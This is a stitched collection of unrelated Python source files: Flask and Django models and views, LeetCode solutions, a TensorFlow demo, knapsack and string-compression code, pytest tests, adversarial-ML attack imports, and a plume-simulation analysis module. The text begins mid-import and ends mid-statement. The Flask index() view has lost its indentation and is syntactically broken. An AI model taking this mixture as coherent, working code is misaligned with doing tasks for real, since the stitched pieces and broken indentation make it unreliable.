TimedJSONWebSignatureSerializer as Serializer,
BadSignature,
SignatureExpired
)
from sql import db
from app.extensions import login_manager
class User(UserMixin, db.Model):
    """Account model with password hashing and signed-token helpers."""
    __tablename__ = 'users'
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(64), unique=True, index=True)
    # Only the salted hash is stored; plaintext passwords are never kept.
    password_hash = db.Column(db.String(128))
    confirmed = db.Column(db.BOOLEAN(), nullable=False, default=False, comment='账户是否已经确认')
    def __init__(self, username):
        self.username = username
        self.confirmed = False
    @property
    def password(self):
        raise AttributeError('password is not a readable attribute')
    @password.setter
    def password(self, password):
        self.password_hash = generate_password_hash(password)
    def generate_reset_token(self, expiration=3600):
        """Return a signed password-reset token valid for `expiration` seconds."""
        s = Serializer(current_app.config['SECRET_KEY'], expiration)
        return s.dumps({'reset': self.id}).decode('utf-8')
    def verify_password(self, password):
        """True when `password` matches the stored hash."""
        return check_password_hash(self.password_hash, password)
    def generate_confirmation_token(self, expiration=3600):
        """Return a signed account-confirmation token valid for `expiration` seconds."""
        s = Serializer(current_app.config['SECRET_KEY'], expiration)
        return s.dumps({'confirm': self.id}).decode('utf-8')
    def confirm(self, token):
        """Validate a confirmation token and mark this account confirmed.

        Bug fix: this method was named ``confirmed``, which replaced the
        ``confirmed`` column attribute in the class namespace (the later
        definition wins), breaking the column mapping; ``self.confirmed = True``
        then clobbered the method on the instance.  Renamed to ``confirm``.
        Returns True on success, False for an invalid/expired token or a
        token issued for a different user.
        """
        s = Serializer(current_app.config['SECRET_KEY'])
        try:
            data = s.loads(token.encode('utf-8'))
        except Exception:
            # Narrowed from a bare except: any decode/signature failure
            # means the token is unusable.
            return False
        if data.get('confirm') != self.id:
            return False
        self.confirmed = True
        db.session.add(self)
        return True
    @staticmethod
    def verify_auth_token(token):
        """Resolve a signed auth token to a User, or None when invalid/expired."""
        s = Serializer(current_app.config['SECRET_KEY'])
        try:
            data = s.loads(token)
        except SignatureExpired:
            return None
        except BadSignature:
            return None
        # NOTE(review): the generators above dump 'reset'/'confirm' keys, not
        # 'id' — confirm which producer creates {'id': ...} tokens.
        return User.query.get(data.get('id'))
    def __repr__(self):
        return f'<User {self.username}>'
@login_manager.user_loader
def load_user(user_id):
    # Flask-Login callback: map the session-stored id back to a User row.
    return User.query.get(int(user_id))
|
from django.db import models
from django.urls import reverse
class Quiz(models.Model):
    """A quiz: a named set of questions with per-user progress tracking."""
    name = models.CharField(verbose_name="Название теста", max_length=255)
    users_passed = models.ManyToManyField(verbose_name="Пользователи прошедшие тест", to='auth.User', blank=True)
    def get_absolute_url(self):
        return reverse('quiz:quiz_detail', args=(self.id,))
    def get_user_tested_count(self):
        """Number of distinct users that answered at least one question."""
        return UserAnswer.objects.filter(answer__question__quiz=self).values_list('user_id').distinct().count()
    def get_next_question(self, user, question=None):
        """First unanswered question for `user`, optionally after `question`; None if done."""
        question_qs = self.question_set.all() if question is None else self.question_set.filter(id__gt=question.id)
        for q in question_qs:
            if q.get_answer_status(user=user) == Question.NOT_ANSWERED:
                return q
        return None
    def get_user_progress(self, user):
        """Return {status: count} over all questions for `user`."""
        statuses = {
            Question.NOT_ANSWERED: 0,
            Question.RIGHT: 0,
            Question.NOT_RIGHT: 0,
        }
        for question in self.question_set.all():
            statuses[question.get_answer_status(user)] += 1
        return statuses
    def __str__(self):
        return self.name
    class Meta:
        verbose_name = "Тест"
        verbose_name_plural = "Тесты"
class Question(models.Model):
    """A quiz question; a user's answer set must exactly match the right answers."""
    # Answer-status codes returned by get_answer_status().
    NOT_ANSWERED = 0
    RIGHT = 1
    NOT_RIGHT = 2
    quiz = models.ForeignKey(verbose_name="Тест", to='Quiz', on_delete=models.CASCADE)
    text = models.TextField(verbose_name="Текст вопроса")
    def get_absolute_url(self):
        return reverse('quiz:question_form', args=(self.id,))
    def get_answer_status(self, user):
        """NOT_ANSWERED / RIGHT / NOT_RIGHT for `user`; RIGHT only on an exact set match."""
        user_answers = set(self.answer_set.filter(useranswer__user=user).values_list('id', flat=True))
        if len(user_answers) == 0:
            return self.NOT_ANSWERED
        right_answers = set(self.answer_set.filter(right=True).values_list('id', flat=True))
        if user_answers == right_answers:
            return self.RIGHT
        return self.NOT_RIGHT
    def get_percent_right_answers(self):
        """Percentage of answering users who chose only right answers."""
        right_users = set(UserAnswer.objects.filter(answer__in=self.answer_set.filter(right=True))
                          .values_list('user_id', flat=True))
        not_right_users = set(UserAnswer.objects.filter(answer__in=self.answer_set.filter(right=False))
                              .values_list('user_id', flat=True))
        # Users who picked any wrong answer do not count as right.
        all_user_answers_count = len(right_users) + len(not_right_users)
        right_user_answers_count = len(right_users - not_right_users)
        if all_user_answers_count > 0:
            return right_user_answers_count / (all_user_answers_count / 100)
        return 0
    def __str__(self):
        return self.text
    class Meta:
        verbose_name = "Вопрос"
        verbose_name_plural = "Вопросы"
class Answer(models.Model):
    """One answer option for a question; `right` marks the correct options."""
    question = models.ForeignKey(verbose_name="Вопрос", to='Question', on_delete=models.CASCADE)
    text = models.TextField(verbose_name="Текст ответа")
    right = models.BooleanField(verbose_name="Правильный ответ", default=False)
    # Users who selected this answer, recorded through UserAnswer.
    users = models.ManyToManyField(verbose_name="Пользователи", to='auth.User', through='UserAnswer', blank=True)
    def __str__(self):
        return self.text
    class Meta:
        verbose_name = "Ответ"
        verbose_name_plural = "Ответы"
class UserAnswer(models.Model):
    """Through-model linking a user to the answer(s) they picked for a question."""
    user = models.ForeignKey(verbose_name="", to='auth.User', on_delete=models.CASCADE)
    question = models.ForeignKey(verbose_name="", to='Question', on_delete=models.CASCADE)
    answer = models.ForeignKey(verbose_name="", to='Answer', on_delete=models.CASCADE)
    class Meta:
        verbose_name = "Ответ пользователя"
        verbose_name_plural = "Ответы пользователей"
|
"""
Attack methods
"""
from .base import Attack
from .deepfool import DeepFoolAttack
from .gradientsign import FGSM
from .gradientsign import GradientSignAttack
from .iterator_gradientsign import IFGSM
from .iterator_gradientsign import IteratorGradientSignAttack
|
# Sum of the integers 1..100.
sum_value = sum(range(1, 101))
print ("1부터 100까지 더한 값 =",sum_value)
# Sum of only the even integers in 1..100.
sum_value = sum(range(2, 101, 2))
print ("1부터 100까지 값들 중에서 짝수만 더한 값 =",sum_value)
|
class Solution(object):
    def searchRange(self, nums, target):
        """
        :type nums: List[int]
        :type target: int
        :rtype: List[int]
        Return [first, last] index of `target` in sorted `nums`,
        or [-1, -1] when absent.  Two binary searches, O(log n).
        """
        left = 0
        right = len(nums) - 1
        def lower_bound(nums, target, left, right):
            # Smallest index whose value is >= target.
            while left <= right:
                # Bug fix: `/` yields a float on Python 3, which then fails
                # as a list index; `//` floor-divides on both Python 2 and 3.
                mid = (right - left) // 2 + left
                if nums[mid] < target:
                    left = mid + 1
                else:
                    right = mid - 1
            return left
        def upper_bound(nums, target, left, right):
            # Largest index whose value is <= target.
            while left <= right:
                mid = (right - left) // 2 + left
                if nums[mid] > target:
                    right = mid - 1
                else:
                    left = mid + 1
            return right
        lower = lower_bound(nums, target, left, right)
        upper = upper_bound(nums, target, left, right)
        if lower == len(nums) or nums[lower] != target:
            return [-1, -1]
        else:
            return [lower, upper]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from .forismatic_quotes import get_quote
from .time_utils import get_time, get_date, get_weekday
from .battary_status import is_battery_low
from .greeting import get_greeting
|
import tensorflow as tf
# What is a placeholder?
# Like a `?` in a database PreparedStatement: the user-supplied value is
# bound into the query later.  A placeholder is a pre-declared slot in an
# expression whose concrete value is provided only at run time.
# Example:
# a = [1,2,3]
# b = a*2
# Here b can only ever compute with the fixed array [1,2,3].  If we want to
# run the same expression on ANY 3-element array, we declare only the shape
# ("an int32 array of length 3") and feed the actual values per run.
a = tf.placeholder(tf.int32,[3])
b = tf.constant(2)
x_op = a * b
# To evaluate the expression we first need a TensorFlow (v1) session.
sess = tf.Session()
# x_op contains an unbound placeholder, so every run MUST supply a value
# for `a` via feed_dict.
r1 = sess.run(x_op, feed_dict={a:[1,2,3]})
print(r1)
r2 = sess.run(x_op, feed_dict={a:[5,3,1]})
print(r2)
row = [10,20,30]
r3 = sess.run(x_op,feed_dict={a:row})
print(r3)
|
from django.contrib import admin
from .models import CSgoUser, Gun
# Register your models here.
class CSgoUserAdmin(admin.ModelAdmin):
    """Admin changelist for CSgoUser accounts."""
    # NOTE(review): listing 'password' displays whatever is stored in that
    # column in the admin — confirm it is not plaintext before shipping.
    list_display = ('username', 'password',)
class GunAdmin(admin.ModelAdmin):
    """Admin configuration for the Gun model (fields: name, cate)."""
    fieldsets = [
        ('枪名', {'fields': ['name']}),
        ('类别', {'fields': ['cate']}),
    ]
    list_display = ('name', 'cate',)
    list_filter = ['cate']
    # Bug fix: 'gun' is not a field on Gun (the model exposes name/cate, as
    # the fieldsets above show); searching on a nonexistent field raises a
    # FieldError in the admin.  Search by gun name instead.
    search_fields = ['name']
# Expose both models in the Django admin with their custom options.
admin.site.register(CSgoUser, CSgoUserAdmin)
admin.site.register(Gun, GunAdmin)
|
import sys
# Knapsack items: [name, weight, value].
products = [
    ['A', 3, 2],
    ['B', 4, 3],
    ['C', 1, 2],
    ['D', 2, 3],
    ['E', 3, 6]
]
# NOTE(review): the small test data above is immediately shadowed by the
# large-weight variant below (same for MAX_WEIGHT) — the first definitions
# are dead; delete one pair.
products = [
    ['A', 3000000000, 2],
    ['B', 4000000000, 3],
    ['C', 1000000000, 2],
    ['D', 2000000000, 3],
    ['E', 3000000000, 6]
]
MAX_WEIGHT = 10
MAX_WEIGHT = 10000000000
def dfs():
    """Brute-force 0/1 knapsack over the module-level `products`/`MAX_WEIGHT`.

    Tries every include/exclude combination: O(2^n) time.
    Returns the best achievable total value.
    """
    def _dfs(n, w):
        if w > MAX_WEIGHT:
            # Portability fix: sys.maxint does not exist on Python 3;
            # sys.maxsize is available on both Python 2 and 3.
            return -sys.maxsize - 1
        if n >= len(products):
            return 0
        # Best of skipping item n vs. taking it (weight products[n][1],
        # value products[n][2]).
        return max(_dfs(n+1, w),
                   _dfs(n+1, w+products[n][1]) + products[n][2])
    return _dfs(0, 0)
def dfs_memo():
    """Memoized 0/1 knapsack over the module-level `products`/`MAX_WEIGHT`.

    NOTE(review): the dp table is (items+1) x (MAX_WEIGHT+1); with the
    10**10 MAX_WEIGHT defined above this allocation is infeasible — confirm
    the intended weight bound before running.
    """
    dp = [[-1]*(MAX_WEIGHT+1) for _ in range(6)]
    def _dfs(n, w):
        if w > MAX_WEIGHT:
            # Portability fix: sys.maxint is Python-2-only; sys.maxsize
            # exists on both Python 2 and 3.
            return -sys.maxsize - 1
        if n >= len(products):
            return 0
        if dp[n][w] < 0:
            dp[n][w] = max(_dfs(n+1, w),
                           _dfs(n+1, w+products[n][1]) + products[n][2])
        return dp[n][w]
    return _dfs(0, 0)
def dfs_dp():
    # Bottom-up 0/1 knapsack: dp[n][w] = best value using the first n items
    # at exactly weight w.  Uses the module-level `products`/`MAX_WEIGHT`.
    dp = [[0]*(MAX_WEIGHT+1) for _ in range(6)]
    dp[0][0] = 0
    ret = 0
    p = products
    for n in range(5):
        for w in range(MAX_WEIGHT+1):
            nw = w + p[n][1]  # weight after also taking item n
            if nw <= MAX_WEIGHT:
                dp[n+1][nw] = max(dp[n+1][nw], dp[n][w] + p[n][2])
                ret = max(dp[n+1][nw], ret)
    return ret
# Python 2 print statements — this script predates Python 3.
print dfs()
print dfs_memo()
print dfs_dp()
|
class Solution1:
    def compress(self, chars):
        """
        :type chars: List[str]
        :rtype: int
        Run-length encode `chars` into a temporary list, then copy it back
        over the prefix of `chars` (uses O(n) extra space).
        """
        i = 1          # scan index (runs one past the current run)
        j = 0          # start index of the current run
        count = 1
        res = []
        # Iterate to len+1 so the final run is flushed after the loop body.
        while i < len(chars) + 1:
            if i < len(chars) and chars[i] == chars[j]:
                count += 1
                i += 1
                continue
            # Run ended: emit the character, then its length digits if > 1.
            res.append(chars[j])
            if count > 1:
                res.extend([ele for ele in str(count)])
            count = 1
            j = i
            i += 1
        chars[:len(res)] = res
        return len(res)
class Solution2:
    def compress(self, chars):
        """
        :type chars: List[str]
        :rtype: int
        In-place run-length encoding via slice assignment: each run
        chars[j:i] is replaced by [char, *count-digits], and the scan index
        is shifted back by the amount the list shrank.
        """
        i = 1          # scan index (runs one past the current run)
        j = 0          # start index of the current run
        count = 1
        while i < len(chars) + 1:
            if i < len(chars) and chars[i] == chars[j]:
                count += 1
                i += 1
                continue
            data = [chars[j]]
            if count > 1:
                data.extend([ele for ele in str(count)])
            # Replace the run in place; `diff` is how much the list shrank,
            # so the scan position must be pulled back by the same amount.
            diff = len(chars[j:i]) - len(data)
            chars[j:i] = data
            i = i - diff
            count = 1
            j = i
            i += 1
        return len(chars)
class Solution:
    def compress(self, chars):
        """
        :type chars: List[str]
        :rtype: int
        In-place run-length encoding: rewrite the prefix of `chars` as
        char [+ count digits when the run length > 1] and return the
        prefix length.  Entries past the returned length are untouched.
        """
        write = 0
        read = 0
        total = len(chars)
        while read < total:
            run_char = chars[read]
            run_start = read
            # Advance `read` to the end of the current run.
            while read < total and chars[read] == run_char:
                read += 1
            run_len = read - run_start
            chars[write] = run_char
            write += 1
            if run_len > 1:
                for digit in str(run_len):
                    chars[write] = digit
                    write += 1
        return write
if __name__ == '__main__':
    # Simple self-checks for the final Solution implementation.
    chars = ["a", "a", "b", "b", "c", "c", "c"]
    res = Solution().compress(chars)
    print(res)
    assert res == 6
    chars = ["a", "b", "b", "b", "c", "c", "c"]
    res = Solution().compress(chars)
    print(res)
    assert res == 5
    chars = ["a"]
    res = Solution().compress(chars)
    print(res)
    assert res == 1
    # A run of 12 compresses to ['b', '1', '2'] — multi-digit counts.
    chars = ["a", "b", "b", "b", "b", "b", "b", "b", "b", "b", "b", "b", "b"]
    res = Solution().compress(chars)
    print(res)
    assert res == 4
|
from info.modules.index import index_blue
from flask import render_template, current_app, session, request, jsonify, template_rendered
from info.models import User, News
from info import constants, response_code
@index_blue.route('/news_list')
def news_list():
    """Home-page news listing API: paginated news for category `cid` as JSON."""
    # Read query parameters.
    cid = request.args.get('cid', '1')
    page = request.args.get('page')
    per_page = request.args.get('per_page')
    # Validate parameters.
    try:
        cid = int(cid)
        page = int(page)
        per_page = int(per_page)
    except Exception as e:
        current_app.logger.error(e)
        # NOTE(review): PWDERR (password error) for a parameter-parsing
        # failure looks wrong — PARAMERR seems intended; confirm against
        # response_code.
        return jsonify(errno=response_code.RET.PWDERR, errmsg="参数错误")
    # Fetch news from the database; cid == 1 means "all categories".
    if cid == 1:
        try:
            paginate = News.query.order_by(News.create_time.desc()).paginate(page, per_page, False)
        except Exception as e:
            current_app.logger.error(e)
            return jsonify(errno=response_code.RET.DBERR, errmsg="查询新闻数据出错")
    else:
        try:
            paginate = News.query.filter(News.category_id == cid).order_by(News.create_time.desc()).paginate(page,
                                                                                                             per_page,
                                                                                                             False)
        except Exception as e:
            current_app.logger.error(e)
            return jsonify(errno=response_code.RET.DBERR, errmsg="查询新闻数据出错")
    news_list = paginate.items
    total_page = paginate.pages
    current_page = paginate.page
    news_dict_List = []
    for news in news_list:
        news_dict_List.append(news.to_basic_dict())
    data = {
        'news_dict_List': news_dict_List,
        'total_page': total_page,
        'current_page': current_page
    }
    return jsonify(errno=response_code.RET.OK, errmsg="OK", data=data)
@index_blue.route("/")
def index():
"""主页视图"""
# 显示登入信息
user_id = session.get('user_id', None)
user = None
User.avatar_url
if user_id:
try:
user = User.query.get(user_id)
except Exception as e:
current_app.logger.error(e)
# 获取新闻排行数据
news_clicks = None
try:
news_clicks = News.query.order_by(News.clicks.desc()).limit(constants.CLICK_RANK_MAX_NEWS)
except Exception as e:
current_app.logger.error(e)
context = {
'user': user,
'news_clicks': news_clicks
}
return render_template('news/index.html', context=context)
@index_blue.route('/favicon.ico')
def favicon():
    """Serve the site favicon from the static folder."""
    return current_app.send_static_file('news/favicon.ico')
|
import re
# NOTE(review): these functions take `self` and call self.assertEquals but
# are defined at module level — they look like unittest.TestCase methods
# detached from their class during extraction; they also reference
# cleanupLine/countWords/countLetters/results, which are not defined here.
# assertEquals is the deprecated alias of assertEqual.
def test_cleanupline(self):
    # Failure message:
    x = "Really? This can't be true! 5.5% is too much (trust me)"
    s1 = cleanupLine(x)
    # Expected: everything except letters, digits and apostrophes replaced
    # by spaces.
    s2 = re.sub("[^a-zA-Z0-9']",' ', x)
    self.assertEquals(s1, s2)
def test_countWords(self):
    # Failure message:
    x = "Hello my Friend hello my other friend2 i really like my friends"
    # Word counting is expected to be case-insensitive ('Hello' + 'hello' == 2).
    dict = countWords(x)
    self.assertEquals(dict['hello'], 2)
    self.assertEquals(dict['my'], 3)
    self.assertEquals(dict['like'], 1)
    self.assertEquals(dict['friend2'], 1)
def test_countLetters(self):
    # Failure message:
    x = "Hello my Friend hello my other friend2 i really like my friends"
    letters = countLetters(x)
    self.assertEquals(letters['e'], 8)
    self.assertEquals(letters['l'], 7)
    self.assertEquals(letters['a'], 1)
    self.assertEquals(letters['y'], 4)
def test_results(self):
    # Failure message:
    mine = [6209,1566,1205,302,132,334]
    yours = results()
    if mine == yours:
        self.assertEquals(mine, yours)
    else:
        # Deliberately failing comparison used to surface the expected
        # numbers in the test output.
        self.assertEquals("my number for e = 6209", "and for to=302")
|
# -*- coding: utf-8 -*-
"""
Test the GenSchema API.
Created on Sun Jul 10 14:32:01 2016
@author: Aaron Beckett
"""
import pytest
from ctip import GenSchema
def test_construction():
    """Test GenSchema constructor."""
    # Default construction: anonymous schema with no variables.
    gen = GenSchema()
    assert gen.name is None
    assert gen.schema == {}
    # Named construction.
    gen = GenSchema("schema_name")
    assert gen.name == "schema_name"
    assert gen.schema == {}
def test_add_invalid_values():
    """Test error detection when adding variables and values to a schema."""
    gen = GenSchema()
    # Unhashable/containers are rejected as variable names...
    with pytest.raises(TypeError): gen.add_values([], 1)
    with pytest.raises(TypeError): gen.add_values({}, 1)
    with pytest.raises(TypeError): gen.add_values(set(), 1)
    with pytest.raises(TypeError): gen.add_values((), 1)
    # ...and as values.
    with pytest.raises(TypeError): gen.add_values(1, [])
    with pytest.raises(TypeError): gen.add_values(1, {})
    with pytest.raises(TypeError): gen.add_values(1, set())
    with pytest.raises(TypeError): gen.add_values(1, ())
    # At least one value is required.
    with pytest.raises(TypeError): gen.add_values(1)
def test_add_values():
    """Test ability to add values to a variable's list of valid values."""
    gen = GenSchema()
    # Inital variable creation; values are stored as (value, dependency)
    # pairs with no dependency yet.
    gen.add_values("var1", 1, 2)
    assert "var1" in gen.schema
    assert gen.schema["var1"] == [(1,None), (2,None)]
    # Add another value to an already created variable
    gen.add_values("var1", 3)
    assert gen.schema["var1"] == [(1,None), (2,None), (3,None)]
    # Add multiple new values to an aready created variable
    gen.add_values("var1", 4, 5, 6)
    assert gen.schema["var1"] == [(1,None), (2,None), (3,None), (4,None), (5,None), (6,None)]
    # Add a duplicate value to an already created variable: ignored.
    gen.add_values("var1", 2)
    assert len(gen.schema["var1"]) == 6
    # Add a new variable; duplicates within one call are also dropped.
    gen.add_values("var2", 2, 3, 1, 1)
    assert len(gen.schema) == 2
    assert len(gen.schema["var1"]) == 6
    assert len(gen.schema["var2"]) == 3
def test_add_dependency_to_non_existent_variable():
    """Ensure dependencies can't be added to variables that don't exist."""
    gen = GenSchema()
    # "var1" was never created, so attaching a dependency must fail.
    with pytest.raises(KeyError):
        gen.add_dependencies("var1", "val1", GenSchema())
def test_add_dependency_to_non_existent_value():
    """Ensure dependencies can't be added to values that don't exist."""
    gen = GenSchema()
    gen.add_values("var1", "val1")
    # "val2" is not among var1's values, so this must fail.
    with pytest.raises(ValueError):
        gen.add_dependencies("var1", "val2", GenSchema())
def test_add_invalid_dependencies():
    """Test TypeError detection when adding dependencies to a schema."""
    gen = GenSchema()
    gen.add_values("var1", 1)
    # Dependencies must be GenSchema instances.
    with pytest.raises(TypeError): gen.add_dependencies("var1", 1, 1)
    with pytest.raises(TypeError): gen.add_dependencies("var1", 1, "bad")
    with pytest.raises(TypeError): gen.add_dependencies("var1", 1, [])
    with pytest.raises(TypeError): gen.add_dependencies("var1", 1, {})
    with pytest.raises(TypeError): gen.add_dependencies("var1", 1, ())
    with pytest.raises(TypeError): gen.add_dependencies("var1", 1, set())
    # At least one dependency argument is required.
    with pytest.raises(TypeError): gen.add_dependencies("var1", 1)
def test_add_dependencies():
    """Test ability to tie a dependency to a specific value."""
    gen = GenSchema()
    # Add dependency to existing value of existing variable; the value's
    # (value, dependency) binding gains a GenSchema in slot 1.
    gen.add_values("var1", "val1")
    gen.add_dependencies("var1", "val1", GenSchema())
    assert len(gen.schema["var1"]) == 1
    binding = gen.schema["var1"][0]
    assert binding[0] == "val1"
    assert isinstance(binding[1], GenSchema)
    # Add dependency to integer value; the value must match by type too
    # (string "2" is not integer 2).
    gen.add_values("var1", 1, 2)
    dep1 = GenSchema()
    dep1.add_values("one", 'a', 'b')
    dep1.add_values("num", 11.1, 34.2)
    with pytest.raises(ValueError):
        gen.add_dependencies("var1", "2", dep1)
    gen.add_dependencies("var1", 2, dep1)
    assert isinstance(gen.schema["var1"][2][1], GenSchema)
    assert len(gen.schema["var1"][2][1].schema) == 2
    # Add another dependency to the same arg: merged into the existing one.
    dep2 = GenSchema()
    dep2.add_values("two", 100, 200)
    gen.add_dependencies("var1", 2, dep2)
    assert isinstance(gen.schema["var1"][2][1], GenSchema)
    assert len(gen.schema["var1"][2][1].schema) == 3
    # Add multiple dependencies to same value in a single call.
    gen.add_values("var2", 1, 3, 2)
    gen.add_dependencies("var2", 3, dep1, dep2)
    assert len(gen.schema["var2"]) == 3
    binding = gen.schema["var2"][1]
    assert binding[0] == 3
    assert isinstance(binding[1], GenSchema)
    assert len(binding[1].schema) == 3
|
from flask import Flask
from config import Config
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_bcrypt import Bcrypt
from flask_moment import Moment
from flask_login import LoginManager
from flask_mail import Mail
# Module-level application and extension setup (no app factory).
app = Flask(__name__)
app.config.from_object(Config)
db = SQLAlchemy(app)        # ORM
migrate = Migrate(app, db)  # schema migrations
bcrypt = Bcrypt(app)        # password hashing
login_manager = LoginManager(app)
login_manager.login_view = 'login'             # endpoint for @login_required redirects
login_manager.login_message_category = 'info'  # flash message category
mail = Mail(app)
moment = Moment(app)
# Imported last so the route/model modules can use the objects defined
# above without a circular import at load time.
from root import routes, models, errors
|
"""
The objective of this module is to average and integrate the variables of
interest and compute the terms in the kinetic and potential energy balance
equations, specifically for the forced plume experiment.
The main idea is to perform this operations without merging the subdmains that
are created from a simulation with several cores, in order to save memory.
In development. To do:
- Compute APE.
- ...
"""
from netCDF4 import Dataset
import numpy as np
import numpy.ma as ma
import pickle
from iosubdomains import Variable
class plume:
    """Reader/analyzer for a forced-plume simulation split across subdomain
    netCDF files.  Computes derived fields (energies, fluxes) and
    cylindrical-control-volume budgets without merging subdomains.
    """
    def __init__(self, folder_path, experiment_name):
        # folder_path: directory holding the '<name>_NN_hist.nc' files and
        # the pickled 'param.pkl' run parameters.
        self.path = folder_path
        self.name = experiment_name
        self.template = folder_path + experiment_name + '_%02i_hist.nc'
        file = self.path + 'param.pkl'
        self.time = Variable(self.template, 't')[:]
        try:
            with open(file, 'rb') as f:
                self.params = pickle.load(f)
        except:
            # NOTE(review): if the pickle is missing, self.params is never
            # set and the lines below raise AttributeError anyway — confirm
            # whether this should abort instead of just printing.
            print(f'There is no {file} file in folder.')
        self.params['global_shape'] = (self.time.shape[0],
                                       self.params['global_nz'],
                                       self.params['global_ny'],
                                       self.params['global_nx'])
        self.params['dx'] = (self.params['Lx']/self.params['global_nx'])
        self.params['dy'] = (self.params['Ly']/self.params['global_ny'])
        self.params['dz'] = (self.params['Lz']/self.params['global_nz']) # just maintain a grid with the same dx in the three directions
    def read_vars(self, vars):
        """
        Read a list of variables from the paramters of the simulation
        'NN' for Brunt-vaisala squared.
        'KE' for Kinetic energy.
        Names not present in the files are dispatched to the derived-field
        methods below; 'u'/'v'/'w' read from file are rescaled by the grid
        spacing.
        """
        fields = {}
        for var in vars:
            try:
                fields[var] = Variable(self.template, var)[:]
            except:
                if var == 'NN':
                    fields[var] = self.brunt_vaisalla()
                elif var == 'KE':
                    fields[var] = self.kinetic_energy()
                elif var == 'Ep':
                    fields[var] = self.potential_energy()
                elif var == 'none':
                    fields[var] = np.ones(self.params['global_shape'])
                elif var == 'APE':
                    fields[var] = self.available_potential_energy()
                elif var == 'Eb':
                    fields[var] = self.background_potential_energy()
                elif var == 'test':
                    fields[var] = self.test()
                elif var == 'p_mean':
                    fields[var] = self.mean_pressure()
                elif var == 'Q_times_z':
                    fields[var] = self.E_2()
                elif var == 'br_times_z':
                    fields[var] = self.E_1()
                elif var == 'phi_z':
                    fields[var] = self.buoyancy_flux()
                elif var == 'phi_b':
                    fields[var] = self.buoyancy_forcing()
                elif var == 'pr':
                    fields[var] = self.backgroud_pressure()
            # Velocities on file appear to be stored as grid-scaled values;
            # divide by the spacing to recover physical units.
            if var == 'u':
                fields[var] = fields[var]/self.params['dx']
            elif var == 'v':
                fields[var] = fields[var]/self.params['dy']
            elif var == 'w':
                fields[var] = fields[var]/self.params['dz']
        return fields
    def brunt_vaisalla(self):
        # Squared Brunt-Vaisala frequency: vertical derivative of buoyancy.
        f = self.read_vars(['b','z'])
        NN = np.diff(f['b'], axis=1)/np.diff(f['z'])[0]
        return NN
    def kinetic_energy(self):
        f = self.read_vars(['u','v','w'])
        # NOTE(review): the interpolated u/v/w below are computed but never
        # used — KE is built from the raw staggered fields; confirm whether
        # the interpolations were meant to feed the sum.
        u = velocity_interpolation(f['u'], axis=3)
        v = velocity_interpolation(f['v'], axis=2)
        w = velocity_interpolation(f['w'], axis=1)
        KE = (f['u']**2 + f['v']**2 + f['w']**2)/2 #[L^2/T^2]
        return KE
    def potential_energy(self):
        # Ep = -b*z at each level.
        b = self.read_vars(['b'])['b']
        z = self.read_vars(['z'])['z']
        Ep = np.zeros_like(b)
        for z_i in range(len(z)):
            Ep[:,z_i] = -b[:,z_i]*z[z_i]
        return Ep
    def available_potential_energy(self):
        b = self.read_vars(['b'])['b']
        # Reference profile: the initial buoyancy column at one corner.
        br = b[0,:,0,0]
        NN = (np.diff(br)/self.params['dz'])[0]
        APE = np.zeros_like(b)
        for z_i in range(len(br)):
            APE[:,z_i,:,:] = (b[:,z_i,:,:] - br[z_i])**2/(2*NN) #[L^2/T^2]
        return APE
    def background_potential_energy(self):
        b = self.read_vars(['b'])['b']
        Eb = -b*z_r(b) #[L^2/T^2]
        return Eb
    def backgroud_pressure(self):
        # Hydrostatic pressure of the reference (t=0) buoyancy field.
        b = self.read_vars(['b'])['b']
        br = b[0]
        dz = self.params['dz']
        pr = np.zeros_like(b)
        for t_i in range(pr.shape[0]):
            pr[t_i] = -br*dz - br[0,0,0]*dz
        return pr
    def Q_flux(self):
        """
        Bottom boundary (volumetric) heat flux. [L/T^2]
        Gaussian-like disk at the domain center, decaying exponentially
        with height over one grid cell.
        """
        fields = self.read_vars(['x','y','z'])
        Z, Y, X = np.meshgrid(fields['z']/self.params['Lz'],
                              fields['y']/self.params['Ly'] - 0.5,
                              fields['x']/self.params['Lx'] - 0.5, indexing='ij')
        r = np.sqrt(X**2 + Y**2)
        r0 = 0.01
        msk = 0.5*(1.-np.tanh(r/r0))
        delta = 1/(self.params["global_nz"])
        Q =1e-5*np.exp(-Z/delta)/delta*msk
        return Q
    def buoyancy_flux(self):
        """
        E_a --ϕ_z--> E_k #[L/T][L/T^2] ~ [L^2 T^-3]
        Vertical flux of buoyancy anomaly, w'*(b - br).
        """
        b = self.read_vars(['b'])['b']
        w = self.read_vars(['w'])['w']
        w = velocity_interpolation(w, axis=1)
        br = b[0,:,0,0]
        #NN = (np.diff(br)/self.params['dz'])[0]
        phi_z = np.zeros_like(b)
        for z_i in range(len(br)):
            phi_z[:,z_i,:,:] = w[:,z_i,:,:]*(b[:,z_i,:,:] - br[z_i])
        return phi_z
    def buoyancy_forcing(self):
        """
        ϕ_b #[L^-1 T^-3][L/T^2][T^2] ~ [T^-3]
        Forcing of APE by the bottom heat flux Q acting on the buoyancy
        anomaly, normalized by the background stratification NN.
        """
        t = self.read_vars(['t'])['t']
        n_time = t.shape[0]
        b = self.read_vars(['b'])['b']
        br = b[0,:,0,0]
        NN = (np.diff(br)/self.params['dz'])[0]
        Q = self.Q_flux()
        phi_b2 = np.zeros_like(b)
        for t_i in range(n_time):
            #aux = np.zeros(len(br))
            #print(aux.shape)
            for z_i in range(len(br)):
                phi_b2[t_i, z_i,:,:] = Q[z_i,:,:]*(b[t_i,z_i,:,:] - br[z_i])/NN
        return phi_b2
    def pressure_fluctuation(self):
        # p' = p minus its horizontal mean at each (t, z).
        p = self.read_vars(['p'])['p']
        global_shape = self.params['global_shape']
        #p_mean = np.zeros(global_shape[:2])
        p_prime = np.zeros_like(p)
        for t_i in range(global_shape[0]):
            for z_i in range(global_shape[1]):
                p_mean = np.mean(p[t_i,z_i])
                p_prime[t_i, z_i, :, :] = p[t_i, z_i, :, :] - p_mean
        return p_prime
    def vertical_pressure_flux(self, r_lim, z_lim):
        """
        ϕp = w'p'dxdy #[L/T][T^-2 L^-1][L^2] ~ [L^2 T^-3]
        Integrated over the control-volume lid (disk of radius r_lim at
        relative height z_lim).
        """
        global_shape = self.params['global_shape']
        Lx = self.params['Lx']
        Ly = self.params['Ly']
        dx = self.params['dx']
        dy = self.params['dy']
        r_max = r_lim # as in forced_plume_nudging.py
        z_max = z_lim
        nz = global_shape[1]
        new_nz = int(nz*z_lim)
        budget = np.zeros(global_shape[0])
        fields = self.read_vars(['x', 'y'])
        X, Y = np.meshgrid(fields['x']/Lx - 0.5,
